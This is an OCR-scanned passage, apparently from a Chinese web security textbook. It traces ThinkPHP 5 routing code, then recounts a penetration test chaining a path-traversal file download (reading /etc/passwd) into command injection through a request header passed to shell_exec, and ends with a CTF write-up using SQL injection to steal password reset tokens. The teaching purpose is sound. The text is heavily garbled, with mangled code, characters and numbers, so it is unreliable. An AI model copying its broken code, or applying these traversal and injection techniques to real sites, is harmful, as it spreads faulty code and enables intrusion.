self::addClassMap(__include_file(RUNTIME_PATH. 'classmap' .EXT)); 

} 

self::loadComposerAutoloadFiles(); 

// 自动 加 载 extend 目录 

seLf: :$faLLbackDirspPsruyd[] = rtrim(EXTEND_PATH，DS); 


该 消 数 的 主要 功能 是 注册 自动 加 载 遂 数 、 目 动 注 册 composer 和 注册 命名 空间 ， 方 便 后 续 使 用 。 


start.php 的 末尾 调用 了 App::run()->send()。 其 中 ，run() 遂 数 是 该 框 染 的 核心 调用 ， 查 看 该 消 数 ， 由 
于 该 水 数 实现 的 功能 较 多 ， 这 里 只 讲述 比较 重要 的 地 方 。 简 化 后 的 代码 如 下 : 


public static function run(Request $request = null) { 
$request = is_null($request) ? Request::instance() : $request,; 
try { 
$config = self::initCommon(); 
/** 初始 化 配置 函数 ， 其 中 主要 调用 了 self: :init()。 数 据 库 信息 、 行 为 扩展 等 配置 信息 等 都 包含 
在 $config 中 
省 略 部 分 为 模块 绪 定 判断 以 及 默认 过 滤器 和 设置 语言 包 的 功能 ， 这 些 不 重要 ， 因 此 略 过 不 讲 x*x*/ 
// 监听 app_dispatch 
Hook: :listen('app_dispatch', self::$dispatch); 
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// 获取 应 用 调度 信息 

$dispatch = seLf::$dispatch 

// 未 设置 调度 信息 则 进行 URL 路 由 检测 

if (empty($dispatch)) { 
$dispatch = self::routeCheck($request, $config); 

} 


// 记录 当前 调度 信息 
$request->dispatch($dispatch); 

/** 略 过 debug 记录 以 及 缓存 检查 x**/ 

$data = self::exec($dispatch, $config); 
/ww 上 略 过 输出 响应 的 处 理 xx/ 

return $response; 


run0) 辫 数 的 开头 是 调用 initCommon() 进 行 初始 化 配置 信息 ， 比 较 重要 ， 其 核心 功能 是 调用 self::init 
()。init0 辫 数 会 读 取 数据 库 配 置 文 件 ， 读 取 行 为 扩展 文件 等 操作 ， 这 里 不 骨 痪 述 。 


然后 进入 下 一 个 关键 功能 一 一 路 由 调度 ， 即 self::routeCheck(0 消 数 ， 代 码 如 下 : 


public static function routeCheck($request, array $config) { 
$path = $request->path(); 
$depr = $config['pathinfo_depr']; 
$result = false; 
// 路 由 检测 
$check = !is_null(self::$routeCheck) ? self::$routeCheck : $config['url_route_on']; 
if ($check) { 
/wx 上 略 过 静态 路 由 的 读 取 和 判断 x*x*/ 
} 
// 路 由 无 效 ， 解 析 模块 /控制 器 /操作 /参数 等 ， 支 持 控制 器 自动 搜索 
if (false === $result) { 
$result = Route::parseUrl($path, $depr, $config['controller_auto_search']); 
} 


return $result; 


不 难 发 现 ，self:routeCheck 国 数 中 开头 就 调用 了 $request->path()， 查 看 如 下 : 


public function path() { 
if (is_null($this->path)) { 
$suffix = Config::get('url_html_suffix'); 
$pathinfo = $this->pathinfo(); 
if (false === $suffix) { 
$this->path = $pathinfo; // 禁止 伪 静 态 访问 
} 
elseif ($suffix) { 
// 去 除 正常 的 URL 后 组 
$this->path = preg_replace('/\.('.ltrim($suffix, '.').')$/i', '', $pathinfo); 
} 
else { // 允许 任何 后 绎 访问 
$this->path = preg_replace('/\.'.$this->ext().'$/i', '', $pathinfo); 
} 
} 
return $this->path; 


} 


该 函数 在 第 一 个 i 们 1 断 中 又 调用 了 4this-> pathinfo0， 查 看 如 下 : 


public function pathinfo() { 
if (is_null($this->pathinfo)) { 

if (isset($_GET[Config::get('var_pathinf0')])) { 
// 判断 URL 中 是 否 有 兼容 模式 参数 
$_SERVER[ 'PATH_INFO'] = $_GET[Config::get('var_pathinfo')]; 
unset($_GET[Config: :get('var_pathinfo')]); 

| 

elseif (IS_CLI) { 
// CLI 模式 下 index.php module/controller/action/params/... 
$_SERVER[ 'PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '' 

} 


// 分 析 PATHINFO 信息 
if (!isset($_SERVER['PATH_INFO'])) { 
foreach (Config::get('pathinfo_fetch') as $type) { 
if (!empty($_SERVER[$type])) { 


$_SERVER['PATH_INF0'] = (6 === strpos($_SERVER[$type], \ 
$_SERVER['SCRIPT_NAME'])) ? substr($_SERVER[$type], \ 
strlen($_SERVER['SCRIPT_NAME'])) : $_SERVER[$type]; 


} 
} 
$this->pathinfo = empty($_SERVER['PATH_INF0']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/'); 
} 
return $this->pathinfo; 
} 


该 函数 对 应 Thinkphp 5 的 两 种 路 由 方式 ， 即 兼容 模式 和 PATHINFO 模 式 。 其 中 ， 兼 容 模式 是 第 一 个 if 

分 支 中 的 内 容 ， 可 以 给 $ GET[Config::get ("var pathinfo') ] 赋 值 来 进行 路 由 访问 ， 而 Config:: 
(var pathinfo') 的 值 默认 是 '$ ， 也 惑 是 党 见 的 index.php? RE 
。PATHINFO 模 式 则 是 index.php/home/index/index 形 式 的 URL。 i 


BEN A OEE :b= 
读 。 下 面 讲解 动态 路 由 的 处 理 ， 即 : 


$result = Route::parseUrl($path, $depr, $config['controller_auto_search']); 


查看 parseUrl0 消 数 如 下 : 


public static function parseUrl($url, $depr = '/', $autoSearch = false) { 
/** 这 里 传递 的 $url 是 类 似 /home/index/index 形式 的 ， 可 能 后 面 还 有 参数 值 ， 
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如 /home/index/index/id/1 
略 过 控制 器 绑 定 不 谈 *x*/ 
$url = str_replace($depr, '|', $url); 
list($path, $var) = self::parseUrlpath($url); 
$route = [null, null, null]; 
if (isset($path)) { 
// 解析 模块 
$module = Config::get('app_multi_module') ? array_shift($path) : null; 
if ($autoSearch) { 
Ee // 自动 搜索 框架 默认 关闭 ， 略 过 不 谈 
} 
else { // 解析 控制 器 
$controller = !empty($path) ? array_shift($path) : null; 
} 
// 解析 操作 
$action = !empty($path) ? array_shift($path) : null; 
// 解析 额外 参数 
seLf: :parseUrLParams(empty($path) ? '' : implode('|', $path)); 
// 封装 路 由 
$route = [$module, $controller, $action]; 
/ww 省 略 了 静态 路 由 的 检测 ， 如 果 访 问 的 路 由 已 经 被 定义 了 ， 需 要 传递 定义 后 的 路 由 ， 否 则 会 返回 4H@4 x**/ 
} 
return ['type' => 'module', 'module' => $route]; 


) 


函数 开头 调用 了 一 个 self::parseUrlPath ($url) ， 定 义 如 下 : 


private static function parseUrLPath($urL) { 

// 分 隔 符 替换 ， 确 保 路 由 定义 使 用 统一 的 分 隔 符 

$url = str_replace('|', '/', $url); 

$url = trim($url, '/'): 

$var = []; 

if (false !== strpos($url, '?')) { // [模块 /控制 器 /操作 ?] 参 数 1= 值 1& 参 数 2= 值 2… 
$info = parse_url($url); 
$path = explode('/', $info['path']); 
parse_str($info['query'], $var); 

} 

elseif (strpos($url, '/')) { // 【模块 /控制 器 /操作 ] 
$path = explode('/', $url); 

} 

else { 
$path = [$url]; 

} 

return [$path, $var],; 


该 函数 的 主要 功能 是 进行 路 由 的 分 割 ， 如 将 /homey/indexyindex 这 样 的 路 由 以 “/” 分割 成 一 个 数 
组 ， 赋 值 给 ypath， 然 后 返回 一 个 二 维 数组 到 parseUrl 中 ; 接 下 来 的 操作 是 调用 3 次 array_shift 浮 数 ， 
从 $path 中 分 别 弹 出 模块 、 控 制 器 、 操 作 。 接 着 调用 parseUrlParams 函 数 解 析 额 外 的 参数 ， 如 果 三 次 
array_shift 操 作 后 ，$path 数 组 中 还 有 剩余 的 参数 ， 就 会 用 “| ”将 剩余 的 参数 拼接 成 一 个 字符 串 并 传 
GA ER 


parseUrlParams(0 函 数 的 代码 如 下 : 


private static function parseUrLParams($urL，&$var = []) { 
if ($url) { 
if (Config::get('url_param_type')) { 
$var += explode('|', $url); 
} 
else { 
preg_replace_callback('/(\w+)\|([*\|]+)/', function ($match) use (&$var) { 
$var[$match[1]] = strip_tags($match[2]); 
yr $url 
} 
} 
Request: :instance()->route($var); // 设置 当前 请 求 的 参数 


该 国 数 中 ， 由 于 url param_type 默 认 值 为 0， 因 此 按照 顺序 解析 参数 是 默认 关闭 的 ， 于 是 进入 else 分 
文 。else 分 支 是 按 名 称 解 析 参 数 ， 所 以 此 处 有 一 个 正则 匹配 。 如 果 传 递 的 字符 串 类 似 Elna le 
”， 就 会 解析 出 $var["id'] =1 和 $var['name']=test， 然 后 将 $var 数 组 融入 route() 了 水 数 。route() 函 

数 的 功能 是 设置 路 由 参数 ,方便 后 续 执行 操作 时 使 用 。 


EES] el: AV [0 ES EE 
route 
]。 该 数组 会 层 层 返回 ， 一 直 返 回 到 run() 函 数 中 并 赋值 给 $dispatch， 有 再 被 带 入 $data= self::exec 


($dispatch，$config) 操作 。 


exec() 国 数 代 码 如 下 : 
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protected static function exec($dispatch, $config) { 
switch ($dispatch['type']) { 


case 'redirect': // 重 定向 跳 转 
/** 省 略 wx/ 
case 'module': // 模块 /控制 器 /操作 


$data = self::module( 
$dispatch['module'], 
$config, 
isset($dispatch['convert']) ? $dispatch['convert'] : null 
下 
break ; 
case 'controller': // 执行 控制 器 操作 
/ww 省 略 wx/ 
case 'method ' : // 回调 方法 
/** 省 略 wx*/ 
case 'function': // 闭 包 
/ww 省 略 wx*/ 
case 'response': // Response 实例 
/** 省 略 wx*/ 
default: 
throw new \InvalidArgumentException('dispatch type not support'); 
} 


return $data; 


exec() 遂 数 有 很 多 分 支 ， 针 对 不 同 的 情况 进入 不 同 的 分 支 ， 这 里 承接 上 文 的 流程 ， 主 要 讲述 module 
分 支 ( 即 最 普遍 的 分 支 ) 。 这 里 的 $dispatch['module'] 是 上 文 分 割 路 由 返回 的 [$module, $ ee 
controller 
，$actionm] 数 组 结构 。 将 该 值 带 入 self:module0， 代 码 如 下 : 


public static function moduLe($resuLt，$config，$convert = null) { 
if (is_string($result)) { 

$result = explode('/', $result); 
} 


$request = Request::instance(); 





if ($config['app_multi_module']) { // 多 模块 部 团 

$module = strip_tags(strtolower($result[0] ?: $config['default_module'])); 
$bind = Route: :getBind('module'), 

$available = false; 

























if ($bind) { 
/** 省 略 绑 定 模块 操作 x**/ 

} 

elseif (!in_array($module, $config['deny_module_list']) && is_dir(APP_PATH.$module)) { 
$available = true; 

} 

if ($module && S$available) { // 模块 初始 化 

// 初始 化 模块 

$request->module($module); 

$config = self::init($module); 

// 模块 请 求 缓存 检查 





Srequest->cache($config['request_cache']， 
$config['request_cache_expire']， 
$config['request_cache_except']); 

} 
else { 

throw new HttpException(464，'modute not exists:' ,$nodule); 
} 

} 

else { // 单一 模块 部 署 

$module = 

$request->module($nodule); 


$request->filter($config[ default_filter']); 







App: :$modulePpath = APP_PATH . ($module ? $module . DS ; ''); 





















// 是 否 自 动 转换 控制 莽 和 抬 作 名 
$convert = is_bool($convert) ? $convert : $config['url_convert']; 

// 获取 控制 器 名 

$controller = strip_tags($result[1] ?: $config['default_controller']); 





if (!preg_match('/*[A-Za-z](\w|\.)*$/", $controller)) { 
throw new HttpException(H84, ‘controller not exists:'.$controller); 


} 


$controller = $convert ? strtolower($controller) : $controller; 





// 获取 操作 各 
$actionName = strip_tags($result[2] ?: $config['default_action’]); 
if (lenpty($config['action_convert"])) { 
$actionName = Loader: :parseName($actionNane, 1); 

} 
else { 

$actionName = $convert ? strtolower($actionName) : $actionName; 
} 







/1/ 设置 当前 询 求 的 裕 制 器 、 操 作 
Srequest->controller(Loader: :parseName($controller, 1))->action($actionName); 
















// BF nodule_init 
Hook: :listen('module_init*, $request); 





try { 
$instance = Loader::controller($controller, 
$config['url_controller_layer'], 
$config['controller_suffix']), 
$config[ 'empty_controller'] ); 
} 
catch (ClassNotFoundException $e) { 
throw new HttpException(464， ‘controller not exists:'.$e->getClass()); 
} 

















// 获取 上 前 振作 名 
$action = gactionMame .gconfig['action_suffix']; 





$vars = []; 
if (is_callable([$instance, $action])) { 
// 执行 操作 方法 
$call = [$instance, $action]; 
// 严格 获取 当前 操作 方法 名 
$reflect = new \ReflectionMethod($instance, $action); 
$methodName = $reflect->getName(); 
$suffix = $config['action_suffix']; 
$actionName = $suffix ? substr($methodName, 0, -strlen($suffix)) : $methodName; 
$request->action($actionName); 
} 
elseif (is_callable([$instance, '_empty'])) { // 空 操作 


dh =S- = . = 
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Fcatt = L31instance, '_empty"J; 
$vars = [$actionName]; 
} 
else { // 操作 不 存在 
throw new HttpException(464，'method not exists:'.get_class($instance).'->'.$action.'()'); 
} 


Hook: :listen('action_begin', $call); 


return self::invokeMethod($call, $vars); 


} 


该 函数 代码 比较 长 ， 关 键 点 如 下 。 


@ 程 序 取 出 module， 判 断 module 是 否 被 禁止 ,以 及 application/module 目 录 是 否 存 在 ， 如 果 存 
在 ， 就 将 $available 置 为 true。 当 $module 和 $available 都 为 true 时 ， 融 开始 执行 初始 化 模块 操作 。 


Q@ 从 9$result 中 取出 controller 和 action (控制 器 和 操作 ) ， 并 做 相应 命名 规范 的 正则 判断 ， 随 后 通过 
如 下 代码 对 controller 进 行 实例 化 : 


$instance = Loader: :controller($controller, 
$config['url_controller_layer'], 
$config['controller_suffix'], 
$config['empty_controller'] ); 


controller() 六 数 是 通过 命名 空间 找到 对 应 控制 器 类 ， 并 通过 反射 返回 一 个 实例 并 赋值 给 $instance。 


@) 得 到 实例 类 后 调用 is callable() 国 数 ， 判 断 action 是 否 可 以 在 controller 中 被 访问 (public 可 以 被 调 
用 ， at protected 不 能 ) 。 如 果 可 以 被 访问 ， 则 继续 通过 反射 获取 相应 的 方法 名 并 设置 ， 方 
便 后 续 调 用 。 这 样 整 体 的 链 就 通 了 ， 即 module 一 controller 一 action。 


图 通过 反射 拿 到 方法 名 后 ， 执 行 self:invokeMethod ($call，$vars) 操作 。 参 数 传递 同步 进行 ， 跟 
Rel AMIAdleLe [SKE 


public static function invokeMethod($method, $vars = []) { 
if (is_array($method)) { 
$class = is_object($method[9]) ? $method[0] : self::invokeClass($method[0]); 
$refLect = new \ReflectionMethod($class, $method[1]); 
} 


else { // 静态 方法 
$refLect = new \ReflectionMethod($method); 


$args = self::bindPparams($reflect, $vars); 


self::$debug && Log::record('[RUN]'.$reflect->class.'->'.$reflect->name.'['.\ 
S$reflect->getFileName().']', 'info'); 


return $reflect->invokeArgs(isset($class) ? $class : null, $args); 


不 难 发 现 ，invokeMethod 逊 数 开头 通过 反射 拿 到 要 执行 的 方法 ， 然 后 调用 bindParams() 绑 定 参 数 ， 
查看 如 下 : 


private static function bindPparams($reflect, $vars = []) { // 自动 获取 请 求 变量 
if (empty($vars)) { 
$vars = Config: :get('url_param_type') ? Request: :instance()->route() : Request: :instance()->param(); 
} 


$args = []; 

if ($reflect->getNumberOfParameters() > 69) { // 判断 数组 类 型 、 数 字数 组 时 ， 按 顺序 绑 定 参 数 
reset($vars); 
$type = key($vars) === 0?1 :90; 


foreach ($refLect->getParameters() as $param) { 
$args[] = self::getParamValue($param, $vars, $type); 
} 
} 


return $args; 


bindParams 函 数 开 头 默认 调用 Request:instance(-> param() 进 行 取 值 ， 碍 看 该 国 数 如 下 : 


public function param($name = '', $default = null, $filter = '') { 
if (empty($this->mergeParam)) { 
$method = $this->method(true); 
switch ($method) { // 自动 获取 请 求 变量 
case 'POST': $vars = $this->post(false); 
break ; 
case "PUT ' : 
case 'DELETE ' : 
case 'PATCH': $vars = $this->put(false); 
break; 
default: $vars = []; 
} 
// 当前 请 求 参数 和 URL 地 址 中 的 参数 合并 
$this->param = array_merge($this->param，4$this->get(faLse)，$vars，4this->route(faLse)); 
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$this->mergeParam = true; 
} 
if (true === $name) { // 获取 包含 文件 上 传 信息 的 数组 
$file = $this->file(): 
$data = is_array($file) ? array_merge($this->param, $file) : $this->param; 
return $this->input($data, '', $default, $filter); 
} 


return $this->input($this->param, $name, $default, $filter); 
} 


param 函 数 的 功能 是 把 请 求 参 数 取 进来 ， 然 后 跟 上 文 提 到 的 路 由 参数 进行 一 次 合并 形成 最 终 的 参数 数 
组 并 返回 。 将 最 终 的 参数 数组 返回 后 ， 调 用 $reflect->getNumberOfParameters0)， 判 断 被 调用 方 
法 是 否 有 参数 ， 如 果 有 ， 融 志 历 方法 参数 ， 并 执行 self::getParamValue ($param， $vars, 

) 。 查 看 该 函数 如 下 : 2 


private static function getParamValue($param, &$vars, $type) { 
$name = $param->getName(); 
$class = $param->getClass(); 


if ($class) { 
/xx 省 略 参 数 为 对 象 的 分 支 wx*/ 
} 
elseif (1 == $type && !empty($vars)) { 
$result = array_shift($vars); 
1 
elseif (9 == $type && isset($vars[$name])) { 
$result = $vars[$name]; // 通常 进入 的 分 支 
} 
elseif ($param->isDefaultValueAvailable()) { 
$result = $param->getDefaultValue(); 
} 
else { 
throw new \InvalidArgumentException('method param miss:'.$name); 


} 


return $result; 


在 默认 情况 下 ，getParamValue 阔 数 会 取出 被 调 用 方法 中 的 所 有 形 参 名 并 将 其 作为 键 名 ， 然 后 在 请 求 
参数 数组 中 取出 对 应 键 的 值 作为 实 参 进行 传递 ， 这 样 束 完 成 了 对 被 调用 万 法 参数 值 的 传递 。 最 后 执行 


$reflect->invokeArgs (isset ($class) ? $class: null，$args) ， 完 成 调用 。 


全 此 ，Thinkphp 5 的 框架 路 由 大 致 完成 了 ， 其 目的 是 让 读者 在 拿 天 一 份 源 码 时 能 够 知道 怎么 入 手 ， 怎 
么 顺 着 入 口 文件 授 清 程序 运作 方式 。 而 不 是 用 一 些 工 具 进 行 扫 摘 后 ， 必 现 了 漏洞 点 ， 却 不 知道 如 何 构 
造 URL 访 问 相对 应 的 页 面 。 当 然 ， 受 篇 幅 影 响 ，Thinkphp 5 框架 的 很 多 功能 并 没有 讲 到 ， 如 参数 信和 是 
如 何 过 滤 的 ， 行 为 扩展 的 运作 及 调用 结束 后 模板 演 染 和 啊 应 。 有 兴趣 的 读者 可 以 目 行 审阅 相关 代码 。 


10.1.3 案例 
1. 从 任意 文件 下 载 到 RCE 


笔者 在 某 次 授权 渗透 测试 过 程 中 ， 先 通过 黑 盒 测试， 在 资料 下 载 处 友 现 了 如 下 URL: 
http://xXxXxXxxx.com/download/file?name=test.docx&path=upload/doc/test.docx 
根据 经 验 ， 此 处 可 能 存在 任意 文件 下 载 漏洞 。 测 试 友 现 通过 : 
http://XxXxxxx.com/download/file?+name=test.docx&path=../../../../../etc/passwd 
可 以 下 载 passwd 文 件 ， 见 图 10-1-23。 因 此 ， 断 定 存在 任意 文件 下 载 漏洞 。 


正在 打开 test.docx 


您 选择 了 打开 : 


test.docx 


文件 类 型 : Text File (1.6 KB) 
字源: 三 一 = gm = 
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图 10-1-23 
该 服务 器 的 响应 头 中 有 “X-Powered-By: PHP/7.0.21”， 于 是 推断 是 一 个 PHP 网 站 。 那 么 这 时 的 思 
路 是 读 取 index.php， 再 根据 各 种 文件 包含 关系 来 不 断 读 取 其 他 文件 ， 尽 可 能 获取 更 多 的 源码 ， 然 后 
进行 代码 审计 来 发 握 更 严重 的 漏洞 。 读 取 到 的 index.php 代 码 见 图 10-1-24。 A 
搭建 的 网 站 ， 读 取 该 框架 的 版 本 号 ， 即 ./thinkphp/base.php ( 见 图 10-1-25) ， 得 到 的 版 本 号 为 
5.0.13。 





图 10-1-24 


图 10-1-25 

得 到 版 本 号 后 ， 可 以 友 现 其 版 本 在 2019 年 前 后 出 现 的 Thinkphp 5 的 RCE 漏 洞 的 版 本 范围 内 ， 但 测试 
后 失败 ， 通 过 读 取 对 应 的 漏洞 文件 ， 友 现 有 补丁 代码 ， 所 以 这 时 需要 查找 网 站 业务 代码 的 漏洞 。 因 为 
application 目 录 下 的 模块 和 控制 器 都 是 动态 调用 的 ， 所 以 此 处 无 法 准确 地 得 到 模块 文件 夹 和 控制 器 的 
名 字 ， 这 时 需要 寻找 代码 中 的 蛛丝马迹 。 在 index.php 中 ，， i 
， 因 此 构造 路 径 为 ./config/config.php 得 到 源码 ， 从 配置 文件 中 得 到 一 些 额外 信息 ， 见 图 10-1- 5 
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图 10-1-26 
这 便 暴露 了 模块 名 和 控制 器 名 字 ， 构 造 下 载 路 径 ./application/admin/controller/Base.php， 得 
到 其 源码 ， 但 其 中 没有 可 利用 的 漏洞 代码 。 那 么 这 时 通过 暴露 的 模块 名 ， 可 以 对 控制 器 名 字 进 行 相应 
的 猜测 或 者 对 常见 控制 器 名 字 进 行 爆 破 。 例 如 ， 文 件 下 载 漏洞 的 URL 为 download/file， 那 么 猜测 存 
在 download 控 制 器 ， 于 是 构造 路 径 为 ./application/admin/controller/download.php， 得 到 源 
码 ， 见 图 10-1-27。 可 异 该 控制 器 只 有 这 一 个 国 数 ， 也 没有 其 他 可 利用 的 函数 。 


图 10-1-27 
在 一 般 情况 下 ， 下 载 与 上 传 功能 是 并 存 的 ， 既 然 有 download， 那 么 肯定 会 有 upload， 于 是 通过 不 断 
尝试 ， 最 终 构造 下 载 路 径 为 ./application/admin/controller/Upload.php， 成 功 获得 源码 。 然 后 
ED 1 ed SY DUES 


图 10-1-28 
这 里 传 入 的 参数 是 攻击 者 可 控 的 ， 直 接 用 正则 表达 式 取 出 后 经， 没有 做 后 缀 名 合法 性 的 判断 ， 并 且 写 
入 的 内 容 也 是 攻击 者 可 控 的 ， 因 此 这 是 一 个 任意 文件 写 入 漏洞 。 但 是 该 控制 器 在 admin 模 块 下， 需要 
先 确 定 是 否 有 权限 限制 ， 通 过 审计 友 现 该 接口 继承 的 是 Controller ( 见 图 10-1-29) ， 没 有 任何 权限 
限制 ， 所 以 可 以 直接 写 入 。 但 构造 完 报 文 友 送 后 ， 却 显示 图 10-1-30 所 示 的 内 容 。 


图 10-1-29 


图 10-1-30 
报错 原因 判断 是 由 静态 路 由 导致 的 ， 根 据 任 意 文件 下 载 的 漏洞 URL 能 判断 出 该 网 站 有 做 静态 路 由 。 根 
据 上 一 节 所 说 ，Thinkphp 5 在 处 理 路 由 请 求 的 时 候 ， 如 果 发 现 该 操作 有 做 静态 路 由 ， 那 么 需要 通过 衣 
态 路 由 来 访问 该 操作 ， 人 否则 会 抛 出 错误 ， 所 以 此 时 需要 读 取 route.php 来 找到 静态 路 由 。 构 造 路 径 
为 ./config/route.php， 读 到 的 route.php 内 容 如 下 。 


er = opendir(CONF_PATH. 'route'); 
es = []; 
while(($filename = readdir($handler)) !== false) { 
if(pathinfo($filename, PATHINFO_EXTENSION) == 'php') { 
$files[] = 'route' .DS.str_replace(EXT, '', $filename); 


ea Pe 
其 功能 是 饥 历 config/route 目 录 下 的 PHP 文 件 ， 真 正 的 静态 路 由 的 定义 放 在 这 些 PHP 文 件 中 。 由 于 无 
法 得 知 其 中 的 文件 名 ， 因 此 无 法 得 到 定义 的 静态 路 由 。 而 在 Thinkphp 框 架 中 一 般 都 会 仓 在 一 些 log 日 
志文 件 ， 位 于 Runtime 目 录 下 ， 其 内 容 往 往 可 能 包含 某 些 路 径 或 者 相关 内 容 。Thinkphp 上 默认 的 log 文 
件 都 是 以 时 间 命 名 的 ， 通 过 通 历 日 期 ， 成 功 下 载 到 100 余 个 log， 但 通过 脚本 饰 选 ， 并 没有 找到 关于 
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64 上 传 功 能 的 路 由 ， 只 找到 了 几 个 module 和 controller， 人 
行 审计 后 ， 依 然 一 无 所 获 。 


Ase 


因为 通过 脚本 往 选 提取 的 只 有 URL 和 文件 路 径 ， 可 能 遗漏 挥 了 其 中 的 一 些 信息 ， 于 是 尝试 手动 筛选 
文件 ， 此 时 其 中 的 一 个 log 文 件 中 的 内 容 引 起 了 笔者 的 注意 ， 见 图 10-1-31。 


| 


财 10-1-31 


log 


出 现 销 误 的 原因 是 在 Hook.php 中 执行 exec0 遂 数 时 出 现 了 未 定义 的 弟 量 。 那 么 ， 什 么 时 候 会 洋 用 _ 
.Php 中 的 exec0 遂 数 呢 ? 这 束 涉 及 Thinkphp 框 染 的 行为 (Behavior) 扩展 功能 。 根 据 报错 可, 
该 网 站 有 目 定 义 的 Behavior， 并 且 根 据 常 量 字 符 串 推断 ， 该 功能 应 该 与 日 志 记 录 有 关 。 日 志 记 录 功 能 
一 般 会 有 写 操 作 或 者 其 他 操作 ， 于 是 读 取 源 码 查 看 。 通 弟 ， 开 友人 员 会 在 tags.php 中 进行 批量 注册 ， 
这 样 更 加 方便 、 快 捷 ， 所 以 构造 路 径 为 ./config/tags.php 成 功 读 取 到 Behavior 定 义 的 相关 源码 ， 其 


内 容 见 图 10-1-32， 可 知 该 网 站 自 定义 了 4 个 Behavior 类 ， 分 别 是 ConfigBehavior、SqlBehavior 
eTe [S70t: Mle]! 
、NGBehavior,。 


图 10-1-32 
继续 通过 上 述 命名 空间 来 构造 文件 的 下 载 路 径 ， 得 到 这 4 个 类 的 代码 。 审 计 后 发 现 ，ConfigBehavior 
的 功能 主要 是 初始 化 配置 ， 没 有 敏感 操作 。SqlBehavior 中 有 一 些 执行 SQL 语 句 的 操作 ， 但 是 SQL 语 
句 并 不 可 控 。 而 报错 的 NGBehavior 类 是 将 日 志 传 到 云 平台 ， 也 没有 敏感 的 信息 。 但 是 LogBehavior 
中 存在 漏洞 ， 代 码 如 下 。 


class LogBehavior { 
public function run(&$content) { 
SaveSqlMiddle: :insertRecordToDatabase(); 
FileLogerMiddle: :write(); 


$siteid = \think\Request::instance()->header('siteid'); 
if ($siteid) { 
shell_exec("php recordlog.php {$siteid} > /dev/null 2>&1 &"); 


类 的 实现 很 简单 ， 是 从 请 求 头 中 取出 siteid 头 ， 再 把 值 拼接 到 执行 合 令 中 ， 明 显 的 命令 执行 漏洞 。 


那么 设 漏洞 如 何 触 点 呢 ”由 于 LogBehavior 类 与 response_ end 绑 定 ， 而 response _ end 是 Thinkphp 
框架 自 带 的 标签 位 。Thinkphp 自 带 的 标签 位 如 下 。 


必 app_init: 应 用 初始 化 标签 位 。 
学 app_begin: 应 用 开始 标签 位 。 


学 module init: 模块 初始 化 标签 位 。 
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必 action _ begin: 控制 器 开始 标签 位 。 

学 view filter: 视图 输出 过 渡 标 签 位 。 

学 app_end: 应 用 结束 标签 位 。 

学 log_write: 日 志 write 方 法 标签 位 。 

学 |og write done: 日 志 写 入 完成 标签 位 (V5.0.10+) 。 
学 response send: 响应 发 送 标 签 位 (V5.0.10+) 。 

学 response end: 输出 结束 标签 位 (V5.0.1+) 。 


response _end 是 在 啊 应 结束 后 自动 触 友 的 ， 因 此 该 命令 执行 没有 任何 限制 ， 只 需 在 请 求 头 中 设置 ee 
Sitei 
头 ， 然 后 往 其 中 插入 需要 执行 的 命令 即 可 。 


以 上 是 该 实例 的 所 有 内 容 ， 记 录 了 从 一 个 任意 文件 下 载 到 最 后 远程 命令 执行 的 全 过 程 ， 其 中 省 略 了 一 
审计 其 他 代码 的 片段 (这 其 实 是 最 耗 时 的 ) 。 在 实际 代码 审计 中 ， 我 们 需要 耐心 、 仔 细 地 得 看 代码 
内 容 ， 每 个 可 疑点 都 需要 跟 进 ， 同 时 要 对 相关 框架 足够 束 悉 ， 这 样 才 能 挖 到 局 质量 的 漏洞 ! 


2 .CTF 真题 


在 护 网 杯 2018 中 有 一 道 代 码 审计 题目 十 分 经 典 ， 题 目 源 码 已 经 开源 : https://github.com/sco4x0/ 
huwangbei2018 easy laravel。 在 比赛 过 程 中 ， 右 键 源 代码 中 友 现 hint 信 息 : https://github. 

/qqqqqqvq/easy laravel1， 可 以 直接 下 载 部 分 代码 ， 通 过 审计 代码 不 难 发 现 其 是 基于 Laravel 框 “ 
架 ， 其 中 生成 管理 员 代 码 中 如 下 : 


$factory->define(App\User: :class, function (Faker\Generator $faker) { 
static $password 


return ['name' => '4uuu Nya', 
'email' => 'admin@qvq.im', 
'password' => berypt(str_random(40)), 
'remember_token' => str_random(10) ]; 


不 难 发 现 ， 管 理 员 的 登录 邮箱 为 admin@qvq.im， 密 码 为 随机 40 位 字符 串 ， 不 能 爆破 。 


然后 查看 路 由 文件 : 


Route: :get('/', function () { return view('welcome'); }); 

Auth: :routes(); 

Route: :get('/home', 'HomeController@index'); 

Route: :get('/note', 'NoteController@index')->name('note'); 

Route: :get('/upload', 'UploadController@index')->name('upload'); 
Route: :post('/upload', 'UploadController@upload')->name('upload'); 
Route: :get('/flag', 'FlagController@showFlag')->name('flag'); 
Route: :get('/files', 'UploadController@files')->name('files'); 
Route: :post('/check', 'UploadController@check')->name('check'); 
Route: :get('/error', ‘'HomeController@error')->name('error'); 


上 友 现 只 有 note 路 由 对 应 的 控制 器 可 以 在 非 admin 用 户 下 访问 ，NoteController 如 下 : 


public function index(Note $note){ 
$username = Auth::user()->name; 
$notes = DB::select("SELECT * FROM 'notes' WHERE ‘author'='{$username}'"); 
return view('note', compact('notes')); 


易 发 现 SQL 语 句 是 没有 任何 过 滤 的 ， 显 然 存 在 sq| 注 入 漏洞 ， 于 是 我 们 可 以 获取 数据 库 中 的 任何 内 
， 即 使 拿 天 了 密码 也 没有 什么 用 ， 因 为 题目 的 注册 登录 的 整个 流程 都 是 Laravel 官 方 推荐 的 : 


那么 ，Laravel 官 方 扩展 中 ， 除 了 注册 登录 功能 ， 还 有 重 置 密码 功能 ， 而 其 重 置 密码 的 password _ 
resels 


是 仓储 在 数据 库 中 的 ， 于 是 利用 NoteController 中 的 SQL 注入 漏洞 ， 便 可 以 获取 password 
resets 
， 从 而 重 置 管理 员 密 码 。 


具体 操作 流程 如 下 : 单 击 重 置 密码 时 ， 输 入 管理 员 邮 箱 admin@qvq.im， 那 么 数据 库 中 的 password_ 
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resets 中 会 更 新 一 个 token， 访 问 /password/reset/token 即 可 重 置 密码 。 首 先 ， 利 用 注入 拿 到 
to 


， 见 图 10-1-33。 然 后 修改 密码 即 可 ， 见 图 10-1-34。 二 


图 10-1-33 


Easy Laravel Login Register 


图 10-1-34 
进入 后 人 台 ， 访 问 http://49.4.78.51:32310/flag 时 提示 no flag。 查 看 FlagController 如 下 : 


public function showFlag() { 
$flag = file_get_contents('/thlsls_F1l4g_2333333'); 
return view('auth.flag')->with('flag', $flag); 


blade 模 板 泻 染 的 与 实际 看 到 的 明显 不 一 样 。 读 者 用 Laravel 应 该 遇 到 过 这 种 问题 “明明 blade 更 新 
